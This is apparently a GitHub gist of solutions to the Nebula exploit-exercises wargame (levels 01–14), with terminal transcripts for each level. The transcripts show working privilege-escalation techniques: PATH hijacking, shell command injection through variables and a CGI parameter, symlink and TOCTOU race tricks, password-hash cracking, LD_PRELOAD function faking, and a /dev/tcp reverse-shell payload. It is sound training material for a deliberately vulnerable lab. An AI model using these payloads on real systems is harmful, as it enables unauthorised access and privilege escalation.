Last active
May 30, 2022 18:20
-
-
Save felmoltor/5c1690b2a31a9d7660405482b68d412c to your computer and use it in GitHub Desktop.
Nebula Exploit Exercises
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level01/ | |
| Solution | |
| -------- | |
| The binary uses the binary "/usr/bin/env echo" call to show a message to the user. | |
| As /usr/bin/env searches for the specified binary in the PATH variable, we can just fake the "echo" binary with our own binary to get a shell. | |
| ---------------- | |
| level01@nebula:/home/flag01$ cat /home/level01/echo | |
| /bin/echo "Welcome to your doom" | |
| bash -i | |
| level01@nebula:/home/flag01$ export PATH=/home/level01/:$PATH | |
| level01@nebula:/home/flag01$ ./flag01 | |
| Welcome to your doom | |
| flag01@nebula:/home/flag01$ id | |
| uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01) | |
| flag01@nebula:/home/flag01$ | |
| ------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level02/ | |
| Solution | |
| -------- | |
| The binary uses as imput of the syscall "system" the environment variable "USER". | |
| This environment variable is under user control and can be modified at desire. The vulnerable call is: | |
| [...] | |
| asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); | |
| [...] | |
| system(buffer); | |
| [...] | |
| As "buffer" is injectable and then is executed, we can inject commands in the variable USER. For example, the command "bash -i" can be injected to obtain a shell as user "flag02" | |
| ------------- | |
| level02@nebula:/home/flag02$ export USER="BLAHBLAH; bash -i; " | |
| level02@nebula:/home/flag02$ ./flag02 | |
| about to call system("/bin/echo BLAHBLAH; bash -i; is cool") | |
| BLAHBLAH | |
| flag02@nebula:/home/flag02$ id | |
| uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02) | |
| flag02@nebula:/home/flag02$ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level03/ | |
| Solution | |
| -------- | |
| There is a crontab being executed by user "flag03". This crontab execute the shell script /home/flag03/writable.sh. | |
| This script executes everything that is inside the folder /home/flag03/writable.d/ with "flag03" privileges. We just need to drop in this folder our own shell script to execute code with flag03 user privileges. | |
| ----------------- | |
| level03@nebula:/home/flag03$ vim writable.d/hacked.sh | |
| level03@nebula:/home/flag03$ cat writable.d/hacked.sh | |
| #/bin/bash | |
| echo "I am `id` being hacked!" > /home/flag03/beinghacked.txt | |
| level03@nebula:/home/flag03$ ls -l | |
| total 1 | |
| drwxrwxrwx 1 flag03 flag03 60 2017-06-20 13:31 writable.d | |
| -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh | |
| [...] | |
| level03@nebula:/home/flag03$ ls -l | |
| total 5 | |
| -rw-rw-r-- 1 flag03 flag03 70 2017-06-20 13:33 beinghacked.txt | |
| drwxrwxrwx 1 flag03 flag03 40 2017-06-20 13:33 writable.d | |
| -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh | |
| level03@nebula:/home/flag03$ cat beinghacked.txt | |
| I am uid=996(flag03) gid=996(flag03) groups=996(flag03) being hacked! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level04/ | |
| Solution | |
| -------- | |
| Open shell with level04:level04 | |
| The program doesn't allow you to read the file with name "token", just make a symbolic link of this forbidden file with a distinct name: | |
| level04@nebula:/home/flag04$ ln -s /home/flag04/token /home/level04/bla | |
| level04@nebula:/home/flag04$ ./flag04 /home/level04/bla | |
| 06508b5e-8909-4f38-b630-fdb148a848a2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level05/ | |
| Solution | |
| -------- | |
| In the /home/flag05 directory there is a .ssh folder where we have no access rights. | |
| There is also a suspicios backup file in /home/flag05/.backup/backup-19072011.tgz | |
| This file seems to contain the ssh files of the .ssh directory, but when extracting we dont have permissions to overwrite the original ones. | |
| We just need to provide to the program a directory where we have write permissions and untar the files there: | |
| level05@nebula:/home/flag05/.backup$ tar tfv backup-19072011.tgz | |
| drwxr-xr-x user/user 0 2011-07-19 02:37 .ssh/ | |
| -rw-r--r-- user/user 394 2011-07-19 02:37 .ssh/id_rsa.pub | |
| -rw------- user/user 1675 2011-07-19 02:37 .ssh/id_rsa | |
| -rw-r--r-- user/user 394 2011-07-19 02:37 .ssh/authorized_keys | |
| level05@nebula:/home/flag05/.backup$ tar xzfv backup-19072011.tgz | |
| .ssh/ | |
| tar: .ssh: Cannot mkdir: Permission denied | |
| [...] | |
| level05@nebula:/home/flag05/.backup$ mkdir /home/level05/lo_tuyo_pa_mi | |
| level05@nebula:/home/flag05/.backup$ tar xzfv backup-19072011.tgz -C /home/level05/lo_tuyo_pa_mi/ | |
| .ssh/ | |
| .ssh/id_rsa.pub | |
| .ssh/id_rsa | |
| .ssh/authorized_keys | |
| level05@nebula:/home/flag05/.backup$ ssh flag05@localhost -i /home/level05/lo_tuyo_pa_mi/.ssh/id_rsa | |
| The authenticity of host 'localhost (127.0.0.1)' can't be established. | |
| ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0. | |
| Are you sure you want to continue connecting (yes/no)? yes | |
| Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. | |
| _ __ __ __ | |
| / | / /__ / /_ __ __/ /___ _ | |
| / |/ / _ \/ __ \/ / / / / __ `/ | |
| / /| / __/ /_/ / /_/ / / /_/ / | |
| /_/ |_/\___/_.___/\__,_/_/\__,_/ | |
| exploit-exercises.com/nebula | |
| For level descriptions, please see the above URL. | |
| To log in, use the username of "levelXX" and password "levelXX", where | |
| XX is the level number. | |
| Currently there are 20 levels (00 - 19). | |
| Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686) | |
| * Documentation: https://help.ubuntu.com/ | |
| New release '12.04 LTS' available. | |
| Run 'do-release-upgrade' to upgrade to it. | |
| The programs included with the Ubuntu system are free software; | |
| the exact distribution terms for each program are described in the | |
| individual files in /usr/share/doc/*/copyright. | |
| Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by | |
| applicable law. | |
| flag05@nebula:~$ whoami | |
| flag05 | |
| flag05@nebula:~$ ls | |
| flag05@nebula:~$ id | |
| uid=994(flag05) gid=994(flag05) groups=994(flag05) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| Solution | |
| -------- | |
| The hint of the level says: | |
| "The flag06 account credentials came from a legacy unix system." | |
| The credentials of the user "flag06" can be found ciphered in file /etc/passwd instead in /etc/shadow. Dump the credentials and crack them with John the ripper on a second machine. | |
| ------------- | |
| level06@nebula:~$ cat /etc/passwd | |
| root:x:0:0:root:/root:/bin/bash | |
| [...] | |
| flag05:x:994:994::/home/flag05:/bin/sh | |
| level06:x:1007:1007::/home/level06:/bin/sh | |
| flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh | |
| [...] | |
| ------ | |
| root@kali:~/nebula/level06# john shadow | |
| Using default input encoding: UTF-8 | |
| Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2]) | |
| Press 'q' or Ctrl-C to abort, almost any other key for status | |
| hello (flag06) | |
| 1g 0:00:00:00 DONE 2/3 (2017-06-20 13:22) 6.666g/s 5000p/s 5000c/s 5000C/s 123456..marley | |
| Use the "--show" option to display all of the cracked passwords reliably | |
| Session completed | |
| --------- | |
| level06@nebula:~$ su flag06 | |
| Password: <----- Insert "hello" as a password | |
| sh-4.2$ bash | |
| flag06@nebula:/home/level06$ whoami | |
| flag06 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| Solution | |
| -------- | |
| The user level07 can execute a simple web server "thttpd" with the configuration file provided by flag07 user. | |
| The configuration file tells the program to execute the file "index.cgi" with a command injection in parameter "Host" with user privileges of "flag07". | |
| ------- | |
| level07@nebula:/home/flag07$ ls -l | |
| total 5 | |
| -rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi | |
| -rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf | |
| level07@nebula:/home/flag07$ thttpd -C thttpd.conf (http://acme.com/software/thttpd/thttpd_man.html) | |
| level07@nebula:/home/flag07$ netstat -natop | |
| (Not all processes could be identified, non-owned process info | |
| will not be shown, you would have to be root to see it all.) | |
| Active Internet connections (servers and established) | |
| Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer | |
| tcp 0 0 127.0.0.1:50001 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| tcp 0 0 0.0.0.0:10007 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| tcp 0 0 192.168.15.135:22 192.168.15.1:6021 ESTABLISHED - keepalive (6319.27/0/0) | |
| tcp 0 0 192.168.15.135:22 192.168.15.1:47547 ESTABLISHED - keepalive (191.27/0/0) | |
| tcp6 0 0 :::22 :::* LISTEN - off (0.00/0/0) | |
| tcp6 0 0 :::7007 :::* LISTEN 875/thttpd off (0.00/0/0) | |
| ---------------- | |
| Open a web browser to the nebula server on port 7007 and inject the command "id" by appending the "id" command to an OR condition "||": | |
| http://192.168.15.135:7007/index.cgi?Host=5||id | |
| uid=1008(level07) gid=1008(level07) groups=1008(level07) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Solution | |
| -------- | |
| Accessing with user level08. | |
| In /home/flag08 there is a readable file "capture.pcap". | |
| This file is downloaded and open with wireshark. Following the TCP flow and showing data as "Hex Dump" we can find the following conversation: | |
| [...] | |
| 00000055 ff fa 22 03 03 e2 03 04 82 0f 07 e2 1c 08 82 04 .."..... ........ | |
| 00000065 09 c2 1a 0a 82 7f 0b 82 15 0f 82 11 10 82 13 11 ........ ........ | |
| 00000075 82 ff ff 12 82 ff ff ff f0 ........ . | |
| 0000007E 0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38 ..Linux 2.6.38-8 | |
| 0000008E 2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a -generic -pae (:: | |
| 0000009E 66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28 ffff:10. 1.1.2) ( | |
| 000000AE 70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62 pts/10). ....wwwb | |
| 000000BE 75 67 73 20 6c 6f 67 69 6e 3a 20 ugs logi n: | |
| 000000B2 6c l | |
| 000000C9 00 6c .l | |
| 000000B3 65 e | |
| 000000CB 00 65 .e | |
| 000000B4 76 v | |
| 000000CD 00 76 .v | |
| 000000B5 65 e | |
| 000000CF 00 65 .e | |
| 000000B6 6c l | |
| 000000D1 00 6c .l | |
| 000000B7 38 8 | |
| 000000D3 00 38 .8 | |
| 000000B8 0d . | |
| 000000D5 01 . | |
| 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: | |
| 000000B9 62 b | |
| 000000BA 61 a | |
| 000000BB 63 c | |
| 000000BC 6b k | |
| 000000BD 64 d | |
| 000000BE 6f o | |
| 000000BF 6f o | |
| 000000C0 72 r | |
| 000000C1 7f . | |
| 000000C2 7f . | |
| 000000C3 7f . | |
| 000000C4 30 0 | |
| 000000C5 30 0 | |
| 000000C6 52 R | |
| 000000C7 6d m | |
| 000000C8 38 8 | |
| 000000C9 7f . | |
| 000000CA 61 a | |
| 000000CB 74 t | |
| 000000CC 65 e | |
| 000000CD 0d . | |
| [...] | |
| The hexadecimal characters "7F" represent the backspace, so the final password of the users is: backd00Rmate. | |
| Elevate with this password and user "flag08" and get access: | |
| level08@nebula:/home/flag08$ su flag08 | |
| Password: | |
| sh-4.2$ bash | |
| flag08@nebula:~$ whoami | |
| flag08 | |
| flag08@nebula:~$ id | |
| uid=991(flag08) gid=991(flag08) groups=991(flag08) | |
| flag08@nebula:~$ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level10/ | |
| Solution | |
| -------- | |
| The file we want to read is /home/flag10/token and we dont have permissions. | |
| The program that can read the file is capable of sending it to an IP to TCP port 18211 in case that we have permissions to read the file. | |
| The program flow shows a vulnerability of type TOCTOU (https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use): | |
| 1. At time 0 (t0) the program check the access we have to the token file | |
| 2. At time 1 (t1) the program sends the file to the remote IP | |
| Between t0 and t1, the file can change its permissions and the check that was done in t0 is no longer valid. | |
| We can make an infinite and fast loop alternating symbolic links pointing to the token file and a random file in with we have read permissions to take advantage of the program. | |
| To do it we open 4 screens: | |
| Screen 1 | |
| -------- | |
| Execute an infinite loop that alternates a symbolic link (/home/level10/blah) between /home/flag10/token and /tmp/level10stuff: | |
| level10@nebula:/home/flag10$ while [ 1 ]; do ln -sf /tmp/level10stuff /home/level10/blah; ln -sf /home/flag10/token /home/level10/blah ; done | |
| Screen 2 | |
| -------- | |
| Start a netcat listening contniuosly on port 18221 and dumping the received contents to /tmp/level10dump: | |
| level10@nebula:/home/flag10$ nc -nlvk 18211 > /tmp/level10dump | |
| Connection from 127.0.0.1 port 18211 [tcp/*] accepted | |
| Connection from 127.0.0.1 port 18211 [tcp/*] accepted | |
| [...] | |
| Screen 3 | |
| -------- | |
| Execute an infinite loop of the program flag10 that sends the file /home/level10/blah to localhost: | |
| level10@nebula:/home/flag10$ while [ 1 ]; do ./flag10 /home/level10/blah 127.0.0.1; done | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| Connecting to 127.0.0.1:18211 .. Connected! | |
| Sending file .. wrote file! | |
| You don't have access to /home/level10/blah | |
| Connecting to 127.0.0.1:18211 .. Connected! | |
| Sending file .. wrote file! | |
| You don't have access to /home/level10/blah | |
| Connecting to 127.0.0.1:18211 .. Connected! | |
| Sending file .. wrote file! | |
| You don't have access to /home/level10/blah | |
| You don't have access to /home/level10/blah | |
| Connecting to 127.0.0.1:18211 .. Connected! | |
| Sending file .. wrote file! | |
| [...] | |
| Screen 4 | |
| -------- | |
| Monitorize the file /tmp/level10stuff to see when the token is received: | |
| level10@nebula:/home/flag10$ tail -f /tmp/level10dump | grep -v "nah" | |
| .oO Oo. | |
| 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 | |
| .oO Oo. | |
| 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 | |
| [...] | |
| .oO Oo. | |
| 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 | |
| .oO Oo. | |
| 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 | |
| .oO Oo. | |
| 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level12/ | |
| Solution | |
| -------- | |
| The "hash" function is prone to remote code execution. Bash commands are injectable through the variable "password". | |
| Instead of sending a string with the password we can send bash commands. | |
| ------------------- | |
| In terminal 1: | |
| level12@nebula:~$ netstat -natop | |
| (Not all processes could be identified, non-owned process info | |
| will not be shown, you would have to be root to see it all.) | |
| Active Internet connections (servers and established) | |
| Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer | |
| tcp 0 0 127.0.0.1:50001 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| tcp 0 0 0.0.0.0:10007 0.0.0.0:* LISTEN - off (0.00/0/0) | |
| [...] | |
| level12@nebula:~$ nc 127.0.0.1 50001 | |
| Password: "A" && bash -i >& /dev/tcp/127.0.0.1/6969 0>&1 | |
| ------------------- | |
| In terminal 2: | |
| level12@nebula:~$ nc -nl 6969 | |
| bash: no job control in this shell | |
| flag12@nebula:/$ id | |
| id | |
| uid=987(flag12) gid=987(flag12) groups=987(flag12) | |
| flag12@nebula:/$ whoami | |
| whoami | |
| flag12 | |
| flag12@nebula:/$ echo "pwned" > /home/flag12/sorry.txt | |
| echo "pwned" > /home/flag12/sorry.txt | |
| flag12@nebula:/$ cat /home/flag12/sorry.txt | |
| cat /home/flag12/sorry.txt | |
| pwned | |
| flag12@nebula:/$ | |
| ------------------------ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level13/ | |
| Solution | |
| -------- | |
| The code of the excersice shows that the important part of the program will only be executed if the UID is equal to 1000 (user nebula in the machine). | |
| The call to getuid() can be faked with our own library implementing getuid() function and using LD_PRELOAD trick. | |
| The tricky part of this exercise is that you also need to copy the "flag13" file to change ownership of this executable for this trick to work. Another way is to execute the "flag13" through another binary like "gdb" or "strace" instead of copying the executable. | |
| ------------------------ | |
| Create file "redefine.c" with this content: | |
| ---- | |
| #include <unistd.h> | |
| uid_t geteuid() { | |
| return FAKE_UID; | |
| } | |
| uid_t getuid() { | |
| return FAKE_UID; | |
| } | |
| ----- | |
| Compile the file to create a library with this options: | |
| $ gcc -DFAKE_UID=1000 -shared -fPIC -o redefine.so redefine.c | |
| ------ | |
| Copy the executable /home/flag13/flag13 to your home folder and execute by using LD_PRELOAD like this: | |
| level13@nebula:~$ LD_PRELOAD=./redefine.so ./flag13 | |
| your token is b705702b-76a8-42b0-8844-3adabbe5ac58 | |
| level13@nebula:~$ su flag13 | |
| Password: | |
| sh-4.2$ id | |
| uid=986(flag13) gid=986(flag13) groups=986(flag13) | |
| sh-4.2$ exit | |
| ------ | |
| Another way to obtain the token, instad of copy the file is using "strace", "ltrace", "gdb" or similar program: | |
| level13@nebula:~$ LD_PRELOAD=./redefine.so strace /home/flag13/flag13 | |
| execve("/home/flag13/flag13", ["/home/flag13/flag13"], [/* 22 vars */]) = 0 | |
| brk(0) = 0x911e000 | |
| [...] | |
| write(1, "your token is b705702b-76a8-42b0"..., 51your token is b705702b-76a8-42b0-8844-3adabbe5ac58 | |
| ) = 51 | |
| exit_group(51) = ? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Problem | |
| ------- | |
| https://exploit-exercises.com/nebula/level14/ | |
| Solution | |
| -------- | |
| This problem does not have any asociated code. | |
| The flag14 executable has only one function, to encrypt the stdin input with a super secret encryption algorithm. | |
| The algorithm can be infered by providing to the file repetitive input to see if the output is a recognizable pattern. | |
| By providing a string of 127 '\x00' characters we can see that the program just add to the ordinal of the character the position of the character. | |
| ------------- | |
| level14@nebula:~$ python -c "print '\x00'*127" | /home/flag14/flag14 -e | |
| !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�level14@nebula:~$ python -c "print '\x00'*127" | /home/flag14/flag14 -e^C | |
| [...] | |
| level14@nebula:~$ cat decrypt.py | |
| #!/usr/bin/env python | |
| import os,sys | |
| if len(sys.argv) <= 1: | |
| print "Usage: %s <encryptedfile>" % sys.argv[0] | |
| exit(0) | |
| f = open(sys.argv[1],"r") | |
| s = f.read() | |
| print "To decrypt: %s " % s | |
| position=0 | |
| result="" | |
| for c in s: | |
| result=result+chr(((ord(c)-position)%256)) | |
| position+=1 | |
| print "Decrypted: %s" % result | |
| --------------- | |
| level14@nebula:~$ ./decrypt.py /home/flag14/token | |
| To decrypt: 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW. | |
| Decrypted: 8457c118-887c-4e40-a5a6-33a25353165� | |
| level14@nebula:~$ su flag14 | |
| Password: | |
| sh-4.2$ id | |
| uid=985(flag14) gid=985(flag14) groups=985(flag14) | |
| sh-4.2$ exit | |
| exit | |
| level14@nebula:~$ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment